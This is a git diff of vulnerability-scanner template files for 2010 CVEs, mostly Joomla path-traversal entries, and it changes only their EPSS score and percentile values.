a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index f3daabf11c..24e2b36fec 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86395 + epss-percentile: 0.86515 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index bdf5759e4b..c09937bb03 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 0f6913faae..fc12e919e1 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1429 cwe-id: CWE-264 epss-score: 0.00573 - epss-percentile: 0.75122 + epss-percentile: 0.75405 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 5d6536e4eb..d6acb01611 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index d1db2b2453..fca7e02947 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79614 + epss-percentile: 0.79853 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 6771437e12..5a5adcbf35 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - epss-percentile: 0.915 + epss-percentile: 0.91623 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 6691ff24e5..5dfd1224e6 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92341 + epss-percentile: 0.92448 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index a6fcf585b5..6440c3a4bb 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1472 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92341 + epss-percentile: 0.92448 cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index ef4a2ff52b..3df52af7c4 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index fa9ce49ac6..94aa4c802f 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83796 + epss-percentile: 0.83956 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 1d1f90edfb..5fdfad4682 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83796 + epss-percentile: 0.83956 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 630b46689f..52b00f9caa 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90353 + epss-percentile: 0.90469 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 8e0ff4a512..8e4147bb62 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1478 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 54f60dd657..fc2662f49d 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1491 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 8a9fadb58a..1e5b4b8f24 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1494 cwe-id: CWE-22 epss-score: 0.02305 - epss-percentile: 0.88291 + epss-percentile: 0.88449 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 66337f19c8..bcadf3580d 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1495 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.91406 + epss-percentile: 0.91517 cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index a6de5422e5..04e5217260 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.8667 + epss-percentile: 0.86795 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 2c091c5017..ef599f1a82 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index ec75c49e54..6717ce9397 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.77913 + epss-percentile: 0.78149 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 03fbdce2cf..d1df850449 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01733 - epss-percentile: 0.86312 + epss-percentile: 0.86427 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 97e2f8b680..3b9261436d 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.77913 + epss-percentile: 0.78149 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 4e5fb08797..459da7e92a 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1540 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.71928 + epss-percentile: 0.72239 cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 4d70f603eb..f980bf7e54 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.3 cve-id: CVE-2010-1586 cwe-id: CWE-20 - epss-score: 0.00846 - epss-percentile: 0.80024 + epss-score: 0.00917 + epss-percentile: 0.81098 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 0b308e76cf..cbe3321b2c 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - epss-percentile: 0.84165 + epss-percentile: 0.84339 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 50063fbc7c..94b068289f 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90259 + epss-percentile: 0.90387 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 871cb70ce9..75dc7a8370 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90259 + epss-percentile: 0.90387 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 21cadfdabc..f2f68f28d0 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - epss-percentile: 0.8629 + epss-percentile: 0.86405 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 4fa5b296a7..df8fbc239f 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90353 + epss-percentile: 0.90469 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 02a1a91fc0..0c55d4ca1a 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86395 + epss-percentile: 0.86515 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index df934b435a..75de2a8fb7 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1658 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86395 + epss-percentile: 0.86515 cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index aca6b5dab9..0ce8d53733 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86644 + epss-percentile: 0.86768 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index d93a17d73a..d7f03b0369 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1714 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86395 + epss-percentile: 0.86515 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 92114b8e73..4531b7e7bf 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83796 + epss-percentile: 0.83956 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 9a0a597930..01980735f4 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1717 cwe-id: CWE-22 epss-score: 0.01733 - epss-percentile: 0.86313 + epss-percentile: 0.86428 cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index f1502fae12..af9d487b9e 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index a05173fd97..478658d9fe 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86069 + epss-percentile: 0.86192 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 2518f37eb0..8c778dbe83 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1722 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83796 + epss-percentile: 0.83956 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 42826ae2cf..effd466a2a 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87217 + epss-percentile: 0.87365 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 1781de6033..7d11d0827a 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1858 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.8306 + epss-percentile: 0.83262 cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index ea84d01d63..9b173bbbca 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2010-1870 cwe-id: CWE-917 - epss-score: 0.04227 - epss-percentile: 0.91141 + epss-score: 0.03869 + epss-percentile: 0.90881 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index e04c715081..7878231f50 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83609 + epss-percentile: 0.83787 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index c974844413..35f82beaa4 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1878 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 393f882215..687c00854c 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83796 + epss-percentile: 0.83956 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 7b26216328..fe2baa0d84 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92341 + epss-percentile: 0.92448 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 87ef842eb2..786451a99d 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1954 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92341 + epss-percentile: 0.92448 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 528bc4d454..1bea90b074 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86069 + epss-percentile: 0.86192 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 3456eec27c..877f7edd3a 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - epss-percentile: 0.92545 + epss-percentile: 0.9265 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index bc44b3274a..fbd926c30d 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86069 + epss-percentile: 0.86192 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 251d86e10d..bee9df9f5f 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 69988a1239..5defd710ad 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1979 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 525dd59f40..bfb993ba63 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1980 cwe-id: CWE-22 epss-score: 0.02401 - epss-percentile: 0.88504 + epss-percentile: 0.88659 cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 4190e6e9b4..aabf711c61 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - epss-percentile: 0.76877 + epss-percentile: 0.77127 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 4217d612fc..66ca88918b 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 143116f43b..050f93803a 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1983 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.8667 + epss-percentile: 0.86795 cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 5ca9f60fc1..24bf557a38 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-2033 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index d700c91591..69d413b065 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2034 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78113 + epss-percentile: 0.78338 cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 06ddd8ceb0..763fb53694 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2035 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78113 + epss-percentile: 0.78338 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git 